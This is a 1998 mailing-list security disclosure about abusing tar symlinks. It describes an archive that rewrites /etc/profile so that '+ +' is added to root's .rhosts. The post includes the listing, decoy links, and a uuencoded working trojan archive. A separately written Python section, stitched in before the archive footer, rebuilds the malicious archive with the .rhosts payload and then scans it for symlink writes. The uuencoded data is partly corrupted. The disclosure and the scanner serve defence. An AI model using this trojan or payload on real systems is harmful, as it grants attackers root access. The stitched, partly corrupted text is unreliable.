Hi all! After reading all these threads about locate, bash ..., I wondered how tar could be abused. Although I didn't find a buffer overflow in a file or directory name (fortunately), I came up with a way to make tar overwrite absolute files on disk (given the user has access to them), but I can't find how to protect from this because it's based on a perfectly legal behaviour: symlinks.

Here's an example of a tar file which will overwrite your /etc/profile to make it add "+ +" to root's .rhosts the next time he logs in. So if part of its directory architecture is included in any package, a root user could un-tar it to any location without really noticing that /etc/profile has been rewritten. Of course it would be simpler with only two files, one link to /root and a .rhosts, but that becomes really evident when you consult the file before extracting it. Note that it could also be interesting to write a key to $ANYUSER/.ssh/authorized_keys!

The output of tar ztvf gives this:

$ tar ztvf trojanhorse.tar.gz
drwxr-xr-x willy/users         0 Sep 21 11:43 1998 Src/
-rw-r--r-- willy/users        46 Sep 21 11:43 1998 Src/Makefile
-rw-r--r-- willy/users        17 Sep 21 11:42 1998 Src/dummy.c
lrwxrwxrwx willy/users         0 Sep 21 11:45 1998 src -> Src
drwxr-xr-x willy/users         0 Sep 21 11:41 1998 Include/
-rw-r--r-- willy/users        30 Sep 21 11:41 1998 Include/config.h
lrwxrwxrwx willy/users         0 Sep 21 11:34 1998 include -> /etc
-rw-r--r-- willy/users       758 Sep 21 11:40 1998 include/profile
lrwxrwxrwx willy/users         0 Sep 21 11:53 1998 include -> Include

The "src" and "Src" directories are just here to make detection less evident. It is the "include" link to /etc which does the work. After processing, it's re-linked to "Include" so that when tar ends, no trace is kept of what has been done, except in /etc/profile.

The file comes here, uuencoded. PLEASE SAVE YOUR /etc/profile before extracting it to any place (/tmp, for example).
I think that if tar gave just a warning each time a file is written after a symlink, and each time a symlink points to /something, this could be good, but perhaps someone would have a better idea.

Willy

--
+----------------------------------------------------------------------------+
| Willy Tarreau - tarreauat_private - http://www-miaif.lip6.fr/willy/ |
| System and Network Engineer at NOVECOM ( France ) - http://www.novecom.fr/ |
| Magistere d'Informatique Appliquee de l'Ile de France ( MIAIF ), Year 1997 |
+----------------------------------------------------------------------------+

begin 644 trojanhorse.tar.gz
M'XL(".$B!C8"`W1R;VIA;FAO<G-E+G1A<@#M6%U/VS`4S6O]*^XR)#10&]MM M$HVI:#S`J`0#+4S[ZB1"XC8>25S9"="7_?;9:4O'-.WCH65:?5YBQS?.]3T^ MOC>)9.(Y*P;T<.C[X```Z?4>7.?``$&`28^$0=#3HYCZ@0.^LP;4JHHE@'/+ M\WSZ2SLFE?/?(=+\G\;7;,1SMJIW$(R#'WA_R+\?+/GW0SU*0L,_MORO'$\A MK8MB"L5\#R`4Y_D>:KUD228,-^X'44,N%(,G+G(L_D/]-SN@DSB/IG]*EOJG MOM%_@+'5_SK@[<P/`"-^V/&LQ#<+2B8K?P>A.`S#/ZG_*";8Z!^'.'2`1FMP M;L/U/RB3O$[92K\!_J;^]W%3_Q%LZ_^U\I^(<L3'G>Q1\G]W6?_[5.\%0GV_ M:_/_FO+_%QT"J`1,Z@KB61V0,6F+@8T`G^G_'\G_)`A\W-3_@:[_J<>JQ.I_ M'?Q[$RE6]@OH-^<_Z0;+\[]'N^;\#[K$GO_K^?]C1+:@'Z&G$$U5Q0JXY2D# M5MYP*<J"E3HUE"F86%7U!+3Y6,:%TN9'=9E47)2J,8AS'BNF8"R`E[.IKV*5 MR02A\X.+X[Z[92Y[7JVD]YZ0-X%WQ4L7G4>D[WX:UB^'&0S??1X.M\!%J,YY MP2MH)_J#H`'B(_@$ESR%]KB\A/ZL6>MF.YZW=7-<Z>T%GU]`E;$2M>HB5M>` M,44L5^R^3RD:<83>1H=O^HMIT,G9J]<'IX?]+7,;G1X,3OJN=Q-+3TV$R+TB MYKG7C&GOCL^BB\;XTJS!RX2JRKA@E^AX$%U$@X^'?>-UTSL:G!PN[["[B9`5 MF$"`7C@L)H+%@_#],V!>!W/'P+B$T$A(X/<!GG/72;V=CLK@!:0"M9I(M>]@ MBR\CT>KH+FKI9:>B9+-@-JO1D91"5/>66I3-[S]W%W9=V-^'KV;8ZTBS2&6& MDPFTT]'Dat_private;2=AF+=6CI\Q_'8/_AOM.FLH#VZ&=SS%PY$>(:X@JF MHI8P]P3VVL]<,*Q`6\'V!U%OWS"X8JR$+$ZN60I74UW2&(&;R;:;51K:;=[_ J-_,_)9B:[S_:P[K^IX,U.+?AY[^%A86%A86%A86%Q>;@&SKXX[<`*```
`
end
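The check Willy asks for at the end of his post (warn whenever a member is written through a symlink, and whenever a symlink points to /something) can be done on the archive listing before anything touches the disk. The following is an added example and not code from the post or from any tar implementation: it rebuilds an archive with the same member order as the trojanhorse.tar.gz listing in memory using Python's tarfile module (the payload bytes and the link target parameter are constructed here; by default the "include" link points at /etc exactly as in the listing, but nothing is ever extracted), then walks the members in archive order, tracking the symlinks a naive extractor would have created so far, and reports the two conditions from the post plus the related absolute or ".." member-name case.

```python
"""
Added example: build an archive shaped like the post's trojanhorse.tar.gz
in memory, then scan it for symlink abuse before extraction.
Nothing here writes to disk.
"""
import io
import posixpath
import tarfile


def build_archive(link_target="/etc"):
    """Return gzip'd tar bytes whose member order mirrors the post's listing.
    Contents are constructed stand-ins; link_target defaults to /etc as in the post."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:

        def add(name, kind, data=b"", target=""):
            ti = tarfile.TarInfo(name)
            ti.type = kind
            ti.mode = 0o755 if kind == tarfile.DIRTYPE else 0o644
            if kind == tarfile.SYMTYPE:
                ti.linkname = target
                ti.mode = 0o777
            ti.size = len(data)
            tf.addfile(ti, io.BytesIO(data) if kind == tarfile.REGTYPE else None)

        add("Src", tarfile.DIRTYPE)
        add("Src/Makefile", tarfile.REGTYPE, b"all:\n\tcc -o dummy dummy.c\n")
        add("Src/dummy.c", tarfile.REGTYPE, b"int main(void){return 0;}\n")
        add("src", tarfile.SYMTYPE, target="Src")            # decoy, like the post
        add("Include", tarfile.DIRTYPE)
        add("Include/config.h", tarfile.REGTYPE, b"#define DUMMY 1\n")
        add("include", tarfile.SYMTYPE, target=link_target)  # the link that does the work
        add("include/profile", tarfile.REGTYPE,
            b"# constructed stand-in for the payload in the post\n"
            b"echo '+ +' >> /root/.rhosts\n")                 # written through the link
        add("include", tarfile.SYMTYPE, target="Include")    # re-linked to hide the trace
    return buf.getvalue()


def link_escapes(link_path, target):
    """True if a symlink at archive path link_path resolves outside the tree."""
    if target.startswith("/"):
        return True
    resolved = posixpath.normpath(posixpath.join(posixpath.dirname(link_path), target))
    return resolved == ".." or resolved.startswith("../")


def scan_archive(data):
    """Walk members in archive order, simulating the symlinks a naive extractor
    would have created at each step, and return (member, reason) findings."""
    findings = []
    links = {}  # archive path -> link target, as left by extraction so far
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        for m in tf:
            name = posixpath.normpath(m.name)
            if m.name.startswith("/") or name == ".." or name.startswith("../"):
                findings.append((m.name, "absolute or parent-traversing member name"))
            if m.issym():
                if link_escapes(name, m.linkname):
                    findings.append((m.name, f"symlink to outside the tree: {m.linkname}"))
                links[name] = m.linkname   # later links to the same name replace earlier ones
                continue
            links.pop(name, None)          # a non-link member replaces an earlier link here
            parts = name.split("/")
            for i in range(1, len(parts)):
                parent = "/".join(parts[:i])
                if parent in links:        # some ancestor is currently a symlink
                    findings.append((m.name, f"written through symlink {parent} -> {links[parent]}"))
                    break
    return findings


if __name__ == "__main__":
    for member, reason in scan_archive(build_archive()):
        print(f"{member}: {reason}")
```

On the archive built with the default target the scan reports the first "include" link (absolute target /etc) and "include/profile" (written through it); the second "include -> Include" link is not flagged on its own, which is exactly why looking at the final state of the tree, or at a listing sorted by name, is not enough and the members must be replayed in archive order. Built with link_target="Include" the only finding is the milder one, a file written through an in-tree symlink, which is the first of the two warnings Willy proposes. Modern GNU tar defers symlink creation to the end of extraction to close this hole, but archives are also unpacked by many other tools, so a pre-extraction scan of this kind is still worth running on untrusted input.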
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:17:25 PDT